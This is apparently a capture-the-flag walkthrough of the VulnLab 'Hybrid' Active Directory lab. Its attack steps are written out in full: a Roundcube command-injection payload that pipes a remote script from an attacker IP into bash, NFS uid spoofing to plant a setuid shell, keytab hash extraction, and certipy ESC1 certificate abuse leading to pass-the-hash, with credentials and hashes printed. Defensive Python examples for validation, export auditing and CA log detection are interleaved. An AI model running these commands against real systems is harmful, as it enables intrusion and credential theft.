HYBRID – VULNLAB
This is the write-up/walkthrough of the HYBRID Active Directory chain machine from VULNLAB.
NMAP SCAN for Machine 1:
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-15 11:38:47Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA/domainComponent=hybrid
| Public Key type: rsa
|_-----END CERTIFICATE-----
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| p+yTJRAkzI1unN2+07G/CQlLIcsRty5l+ogVYq6Y4T8kxscOJA==
|_-----END CERTIFICATE-----
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA/domainComponent=hybrid
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HYBRID
| NetBIOS_Domain_Name: HYBRID
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: hybrid.vl
| DNS_Computer_Name: dc01.hybrid.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-08-15T11:39:30+00:00
Domain: HYBRID.VL, NetBIOS name: DC01
Looking at the domain, found that this is the root domain.
NMAP SCAN for Machine 2:
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 60:bc:22:26:78:3c:b4:e0:6b:ea:aa:1e:c1:62:5d:de (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLl+dlYZiceVG9g/8U0XSs4cWJ/6msyXPI/mORr9T9i4oQA66eYZSYwrxEwYwDZvrhXu7foZtEdeu3u6uSUnl4k=
| 256 a3:b5:d8:61:06:e6:3a:41:88:45:e3:52:03:d2:23:1b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILJyLrRGDcNfa9bQg1dhsV/CPQapLeRxpWJDUOQ+MI1c
25/tcp open smtp syn-ack Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Redirecting...
110/tcp open pop3 syn-ack Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL PIPELINING AUTH-RESP-CODE RESP-CODES TOP STLS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after: 2033-06-14T13:20:17
| MD5: 3837:2b81:2fb1:6f03:4360:25b4:d26b:db29
| SHA-1: 61c2:4002:71ff:7850:e0da:4a5a:e256:e7df:666b:b008
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
| rpcinfo:
|
143/tcp open imap syn-ack Dovecot imapd (Ubuntu)
|_imap-capabilities: more have IDLE LITERAL+ ENABLE LOGINDISABLEDA0001 Pre-login capabilities OK listed SASL-IR ID IMAP4rev1 STARTTLS post-login LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
587/tcp open smtp syn-ack Postfix smtpd
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
993/tcp open ssl/imap syn-ack Dovecot imapd (Ubuntu)
|_imap-capabilities: more have ID LITERAL+ ENABLE OK capabilities AUTH=PLAIN Pre-login listed SASL-IR AUTH=LOGINA0001 IMAP4rev1 LOGIN-REFERRALS post-login IDLE
|_ssl-date: TLS randomness does not represent time
2049/tcp open nfs_acl syn-ack 3 (RPC #100227)
50001/tcp open mountd syn-ack 1-3 (RPC #100005)
Looking at the Nmap result, found that this is a Linux machine joined to the domain.
Interesting services are running, like HTTP, POP3 and SMTP.
Going to port 80, it redirects to mail01.hybrid.vl; added the domain to the /etc/hosts file and landed on a Roundcube webmail portal asking for a username and password.
Enumerating the NFS share on port 2049 using showmount.
showmount -e IP
Found a share and mounted it using the mount command.
mount -t nfs IP:/opt/share /mnt/
After extracting the files, found the username and password for the Roundcube mail portal on port 80 in the etc/dovecot folder.
cat dovecot-users
After logging in, checked the Roundcube version and found that it is running 1.6.1. Looking for the latest exploit, found an RCE exploit that goes through the markasjunk plugin, and the markasjunk plugin was installed.
To exploit this, first created rev.sh on my attacker machine and started a Python HTTP server; then modified the Roundcube exploit payload to fetch rev.sh from the attacker machine and execute it by piping it to bash.
admin&curl${IFS}10.8.0.221/rev.sh${IFS}|bash${IFS}&@hybrid.vl
After that, entered this payload in the admin profile's email field and saved it.
After that, logged in as peter.turner and sent an email to [email protected].
Then logged in as admin again, checked the Inbox for new messages, found peter.turner's message, and clicked the Junk button to move it to the Junk folder.
After clicking the Junk button, got a shell as the www-data user.
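The shell above comes from an identity e-mail value that the application later hands to a command line. From the defender's side, the generic control is an allow-list check at the input boundary (keeping Roundcube patched is the actual fix). The following is an added example, not code from the walkthrough or from Roundcube: a strict validator that rejects the exact payload quoted above, plus a helper that lists the shell metacharacters in a stored address so a monitoring job can alert on them. The sample addresses are constructed.

```python
import re

# Constructed inputs. The injection string is the identity e-mail quoted in
# the walkthrough above; the others are ordinary or mildly malformed addresses.
INJECTION = "admin&curl${IFS}10.8.0.221/rev.sh${IFS}|bash${IFS}&@hybrid.vl"
SAMPLES = {
    "peter.turner@hybrid.vl": True,
    "admin@hybrid.vl": True,
    INJECTION: False,
    "admin@hybrid.vl;id": False,
    "first last@hybrid.vl": False,
}

# Allow-list for an address that may later reach a command line: the local
# part and the domain labels are restricted to a conservative alphabet, so
# shell metacharacters are rejected by construction instead of deny-listed.
EMAIL_RE = re.compile(
    r"[A-Za-z0-9._%+-]{1,64}@(?:[A-Za-z0-9-]{1,63}\.)+[A-Za-z]{2,63}"
)

# Characters worth alerting on when they appear in a stored e-mail field.
# Braces are included because ${IFS} expands to whitespace in a shell, which
# is how the payload above gets by without any literal space character.
SHELL_META = set("$|&;`<>(){}\\'\" \t\n\r")


def is_safe_email(value: str) -> bool:
    """True only if the whole string matches the allow-list pattern."""
    return EMAIL_RE.fullmatch(value) is not None


def shell_metachars(value: str) -> list:
    """Shell metacharacters present in value, sorted, for logging or alerting."""
    return sorted(c for c in set(value) if c in SHELL_META)


def classify_all(samples=SAMPLES) -> dict:
    """Map every sample address to the validator's verdict."""
    return {s: is_safe_email(s) for s in samples}


if __name__ == "__main__":
    for addr, verdict in classify_all().items():
        flag = "OK  " if verdict else "DENY"
        print(f"{flag} {addr!r} metachars={shell_metachars(addr)}")
```

The validator is deliberately stricter than RFC 5322 (quoted local parts, for instance, are refused); for a field that ends up in a shell command that trade-off is the point. A filter that only strips spaces would not have caught the payload, which is why the metacharacter report includes the braces of `${IFS}`.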
After enumerating more, found two articles on exploiting an NFS share for privilege escalation; following article1 and article2, escalated my privileges to the [email protected] user.
Checked the uid of the user peter.turner and copied it.
www-data@mail01:/opt/share$ id [email protected]
id [email protected]
uid=902601108([email protected]) gid=902600513(domain [email protected]) groups=902600513(domain [email protected]),902601104([email protected])
After that, on my attacker machine created a “[email protected]” user and edited the /etc/passwd file, changing the uid and gid to 902601108.
On the victim machine, copied /bin/bash to the /opt/share folder.
www-data@mail01:/opt/share$ cp /bin/bash .
On the attacker machine, I had already mounted the NFS share using sudo mount; then spawned a shell as user [email protected], copied the bash binary from the NFS share to the /tmp directory, removed the bash file from /opt/share as www-data, then copied /tmp/bash back to the /mnt/ directory so that the file's owner uid changes, and after that set the setuid bit on /mnt/bash.
sudo su -l [email protected]
# on the attacker machine; the share is already mounted on /mnt using sudo
cp /mnt/bash /tmp/bash
# copying as this user makes /tmp/bash owned by uid 902601108
# then remove bash from /opt/share in the reverse shell as www-data
www-data@mail01:/opt/share$ rm bash
# then on the attacker machine copy /tmp/bash back to /mnt/bash
cp /tmp/bash /mnt/bash
# and set the setuid bit on /mnt/bash
chmod +s /mnt/bash
# in the reverse shell, run bash -p to get a shell as user [email protected]
/opt/share/bash -p
Shell as [email protected]
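The escalation above works because the export trusts whatever non-root uid the client presents: root_squash (the default) only remaps uid 0, so a client that controls its own /etc/passwd can write a file owned by any local account and mark it setuid. The check a defender wants is therefore on the export options, not on the client mount. The following is an added example, not part of the walkthrough: a small /etc/exports auditor that parses each client spec and flags wide-open hosts, no_root_squash, and writable exports that lack all_squash. The sample exports file is constructed; the lab's real file is not shown on the page.

```python
import re

# Constructed sample /etc/exports. The walkthrough only tells us that
# /opt/share was exported and writable; the other lines are for contrast.
EXPORTS = """
# path           clients(options)
/opt/share       *(rw,sync,no_subtree_check)
/srv/backup      10.10.0.0/16(ro,sync,root_squash)
/srv/scratch     10.10.5.7(rw,sync,all_squash,anonuid=65534,anongid=65534)
/srv/admin       10.10.5.7(rw,no_root_squash)
"""

# One client spec: "host" or "host(opt,opt,...)"
CLIENT_RE = re.compile(r"([^(]+)(?:\((.*)\))?")


def parse_exports(text):
    """Return a list of (path, client, options) tuples, one per client spec."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        path, *client_specs = line.split()
        for spec in client_specs:
            m = CLIENT_RE.fullmatch(spec)
            client, opts = m.group(1), (m.group(2) or "")
            options = {o.strip() for o in opts.split(",") if o.strip()}
            entries.append((path, client, options))
    return entries


def assess_export(path, client, options):
    """Risk findings for one export entry (empty list means nothing flagged)."""
    findings = []
    if client == "*":
        findings.append("exported to every host")
    if "rw" in options:   # exports are read-only unless rw is given explicitly
        if "no_root_squash" in options:
            findings.append("remote root is not squashed: clients can write "
                            "root-owned files, including setuid ones")
        elif "all_squash" not in options:
            # root_squash only remaps uid 0. Every other uid the client
            # presents is trusted, so a client-chosen uid maps straight onto
            # the matching local account, which is the escalation used above.
            findings.append("non-root uids are trusted: a client-chosen uid "
                            "maps onto the matching local account")
    return findings


def audit(text=EXPORTS):
    """Map each exported path to the findings across all of its client specs."""
    report = {}
    for path, client, options in parse_exports(text):
        report.setdefault(path, []).extend(assess_export(path, client, options))
    return report


if __name__ == "__main__":
    for path, findings in audit().items():
        print(path, "->", findings or ["ok"])
```

Restricting the client list and adding all_squash (so every remote uid becomes the anonymous user) removes the uid-matching trick; mounting the directory that backs the export with nosuid on the server is a second layer, since in the walkthrough the setuid binary is executed locally on mail01, not over the client mount.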
After getting the user, found a passwords.kdbx file in peter.turner's home directory, downloaded it to my attacker machine, extracted the hash using keepass2john, and tried cracking the password using john and hashcat, but it didn't work.
Looking further, I already had two passwords from the Roundcube mail, so I tried opening passwords.kdbx with peter.turner's password, and it worked.
Using KeePassXC to open passwords.kdbx, got the password of user peter.turner, and now I was able to SSH in as peter.turner.
Checking sudo permissions, found that user peter.turner has ALL rights; used “sudo su” to get the root user, and got the second flag in the /root directory.
After enumerating more, searched the domain's certificate templates using Certipy and found a vulnerable template.
C:\home\kali\vulnlab\hybrid> certipy find -u [email protected] -p 'b0cwR+G4Dzl_rw' -dc-ip 10.10.186.213
Certipy v4.5.1 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'hybrid-DC01-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'hybrid-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'hybrid-DC01-CA'
[*] Saved BloodHound data to '20230816041310_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20230816041310_Certipy.txt'
[*] Saved JSON output to '20230816041310_Certipy.json'
cat 20230816041310_Certipy.txt
Certificate Templates
0
Template Name : HybridComputers
Display Name : HybridComputers
Certificate Authorities : hybrid-DC01-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Extended Key Usage : Client Authentication
Server Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : HYBRID.VL\Domain Admins
HYBRID.VL\Domain Computers
HYBRID.VL\Enterprise Admins
Object Control Permissions
Owner : HYBRID.VL\Administrator
Write Owner Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Dacl Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
Write Property Principals : HYBRID.VL\Domain Admins
HYBRID.VL\Enterprise Admins
HYBRID.VL\Administrator
[!] Vulnerabilities
ESC1 : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
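Certipy's ESC1 finding above is the conjunction of several template properties, and a defender auditing templates by hand (or from the text report) needs the same logic. The following is an added example, not code from the walkthrough or from Certipy: a parser for the text block printed above, with the multi-value lines re-indented the way the tool prints them, and a function that re-derives the ESC1 verdict (enabled, enrollee supplies subject, client-authentication EKU, no manager approval, no required signatures, and enrollment rights granted to a broad principal). A what-if helper shows which single setting change clears the finding.

```python
import re

# The HybridComputers block from the Certipy text report above, re-indented.
CERTIPY_TEXT = r"""
Template Name                       : HybridComputers
Display Name                        : HybridComputers
Certificate Authorities             : hybrid-DC01-CA
Enabled                             : True
Client Authentication               : True
Enrollment Agent                    : False
Any Purpose                         : False
Enrollee Supplies Subject           : True
Certificate Name Flag               : EnrolleeSuppliesSubject
Extended Key Usage                  : Client Authentication
                                      Server Authentication
Requires Manager Approval           : False
Requires Key Archival               : False
Authorized Signatures Required      : 0
Validity Period                     : 100 years
Renewal Period                      : 6 weeks
Minimum RSA Key Length              : 4096
Permissions
  Enrollment Permissions
    Enrollment Rights               : HYBRID.VL\Domain Admins
                                      HYBRID.VL\Domain Computers
                                      HYBRID.VL\Enterprise Admins
  Object Control Permissions
    Owner                           : HYBRID.VL\Administrator
    Write Owner Principals          : HYBRID.VL\Domain Admins
                                      HYBRID.VL\Enterprise Admins
                                      HYBRID.VL\Administrator
"""

SECTION_HEADERS = {"Permissions", "Enrollment Permissions", "Object Control Permissions"}

# Principals every domain account or machine belongs to. Enrollment rights
# for these are what turn "enrollee supplies subject" into ESC1.
BROAD_PRINCIPALS = {"domain computers", "domain users", "authenticated users", "everyone"}


def parse_template(text):
    """Parse one template block into {field: [values]}. Lines without a colon
    continue the previous field, which is how the tool prints multi-value fields."""
    fields, last_key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in SECTION_HEADERS:
            last_key = None
            continue
        if ":" in line:
            key, value = (part.strip() for part in line.split(":", 1))
            fields[key] = [value]
            last_key = key
        elif last_key is not None:
            fields[last_key].append(line)
    return fields


def _is_true(fields, name):
    return fields.get(name, ["False"])[0].lower() == "true"


def esc1_enrollers(fields):
    """Broad principals that can enroll in an ESC1-vulnerable template.
    An empty list means at least one ESC1 precondition is not met."""
    eku = {v.lower() for v in fields.get("Extended Key Usage", [])}
    client_auth = (_is_true(fields, "Client Authentication")
                   or _is_true(fields, "Any Purpose")
                   or "client authentication" in eku)
    enrollers = [p.split("\\", 1)[-1].lower()
                 for p in fields.get("Enrollment Rights", [])]
    broad = sorted(p for p in enrollers if p in BROAD_PRINCIPALS)
    preconditions = (
        _is_true(fields, "Enabled"),
        _is_true(fields, "Enrollee Supplies Subject"),
        client_auth,
        not _is_true(fields, "Requires Manager Approval"),
        fields.get("Authorized Signatures Required", ["0"])[0] == "0",
        bool(broad),
    )
    return broad if all(preconditions) else []


def hardened(text, field, value):
    """Return the block with one 'Field : value' line replaced, for what-if checks."""
    pattern = rf"^(\s*{re.escape(field)}\s*:\s*).*$"
    return re.sub(pattern, rf"\g<1>{value}", text, flags=re.M)


if __name__ == "__main__":
    print("as found:", esc1_enrollers(parse_template(CERTIPY_TEXT)))
    fixed = hardened(CERTIPY_TEXT, "Requires Manager Approval", "True")
    print("with manager approval:", esc1_enrollers(parse_template(fixed)))
```

Either removing Domain Computers from the enrollment rights, turning off "Enrollee Supplies Subject", or requiring manager approval clears the verdict; the what-if helper makes that easy to confirm before touching the template in AD.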
Looking at the Enrollment Rights, found that only Domain Computers have rights. As I had the domain-joined MAIL01$ machine, enumerated more on MAIL01$ and found the /etc/krb5.keytab file, which is used to authenticate to Kerberos without any human interaction and without storing the password.
Transferred the “krb5.keytab” file to my machine and used keytabextract.py to extract information about MAIL01$ and its hashes.
C:\home\kali\vulnlab\hybrid> python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HYBRID.VL
SERVICE PRINCIPAL : MAIL01$/
NTLM HASH : 0f916c5246fdbc7ba95dcef4126d57bd
AES-256 HASH : eac6b4f4639b96af4f6fc2368570cde71e9841f2b3e3402350d3b6272e436d6e
AES-128 HASH : 3a732454c95bcef529167b6bea476458
Using the hash of MAIL01$, requested a certificate from the “HybridComputers” template with the Administrator UPN (User Principal Name), setting the key size to 4096 as required by the “Minimum RSA Key Length”.
Note: make sure you have added dc01.hybrid.vl and hybrid.vl to the /etc/hosts file.
certipy req -u 'MAIL01$'@hybrid.vl -hashes 0f916c5246fdbc7ba95dcef4126d57bd -c 'hybrid-DC01-CA' -target 'hybrid.vl' -template 'HybridComputers' -upn '[email protected]' -dns 'dc01.hybrid.vl' -key-size 4096 -debug
Or, without adding them to the /etc/hosts file:
certipy req -u 'MAIL01$'@hybrid.vl -hashes 0f916c5246fdbc7ba95dcef4126d57bd -c 'hybrid-DC01-CA' -target 'hybrid.vl' -template 'HybridComputers' -upn '[email protected]' -dc-ip 10.10.186.213 -key-size 4096 -debug
After getting the .pfx file (certificate and private key), used Certipy to authenticate to the DC with it.
certipy auth -pfx administrator_dc01.pfx -dc-ip 10.10.186.213
After entering the command, it asked me to select “UPN” or “DNS Host Name”; selected UPN by entering 0 and got the hash of the Administrator account. After that, used evil-winrm to log in as the Administrator account.
evil-winrm -u administrator -H 60701e8543c9f6db1a2af3217386d3dc -i 10.10.186.213
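The issuance above is visible to a defender: the CA logged a certificate requested by the MAIL01$ machine account whose subject alternative name carries a different identity (the Administrator UPN and the dc01 DNS name). The following is an added detection example, not code from the walkthrough: it runs over constructed, simplified records standing in for what a CA's security log carries per request (Windows event ID 4886 for a request received and 4887 for a certificate issued; both require CA auditing to be enabled) and flags every record whose SAN identities do not match the requesting principal. The field names in the records are this example's own shorthand, not the events' exact schema.

```python
# Constructed, simplified issuance records. The first mirrors the request made
# in the walkthrough; the others are benign enrollments for contrast.
ISSUANCE_EVENTS = [
    {"event_id": 4887, "requester": "HYBRID\\MAIL01$", "template": "HybridComputers",
     "san_upn": "administrator@hybrid.vl", "san_dns": "dc01.hybrid.vl"},
    {"event_id": 4887, "requester": "HYBRID\\MAIL01$", "template": "HybridComputers",
     "san_upn": "", "san_dns": "mail01.hybrid.vl"},
    {"event_id": 4887, "requester": "HYBRID\\peter.turner", "template": "User",
     "san_upn": "peter.turner@hybrid.vl", "san_dns": ""},
    {"event_id": 4886, "requester": "HYBRID\\MAIL01$", "template": "HybridComputers",
     "san_upn": "administrator@hybrid.vl", "san_dns": ""},   # request received
]

INTERESTING_EVENTS = {4886, 4887}   # request received, certificate issued


def account_from_requester(requester):
    """'DOMAIN\\name' -> 'name' (lower-cased for comparison)."""
    return requester.split("\\", 1)[-1].lower()


def san_identities(event):
    """Account names a certificate's SAN would let its holder act as.
    A UPN maps to its local part; a DNS host name maps to the machine
    account 'host$' that would legitimately own that name."""
    ids = set()
    if event["san_upn"]:
        ids.add(event["san_upn"].split("@", 1)[0].lower())
    if event["san_dns"]:
        ids.add(event["san_dns"].split(".", 1)[0].lower() + "$")
    return ids


def find_san_mismatches(events):
    """(event_id, requester, template, [foreign identities]) for every record
    where the SAN names someone other than the requester."""
    hits = []
    for ev in events:
        if ev["event_id"] not in INTERESTING_EVENTS:
            continue
        requester = account_from_requester(ev["requester"])
        foreign = sorted(i for i in san_identities(ev) if i != requester)
        if foreign:
            hits.append((ev["event_id"], ev["requester"], ev["template"], foreign))
    return hits


if __name__ == "__main__":
    for event_id, requester, template, foreign in find_san_mismatches(ISSUANCE_EVENTS):
        print(f"event {event_id}: {requester} requested {template} "
              f"for {', '.join(foreign)}")
```

Alerting on 4886 as well as 4887 catches the attempt even when the CA refuses or a manager-approval step holds the request; a mismatch between requester and SAN on a template that allows the enrollee to supply the subject is the signal to watch for, and the template itself should be fixed as shown earlier.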
If you face any problems, let me know in the comments.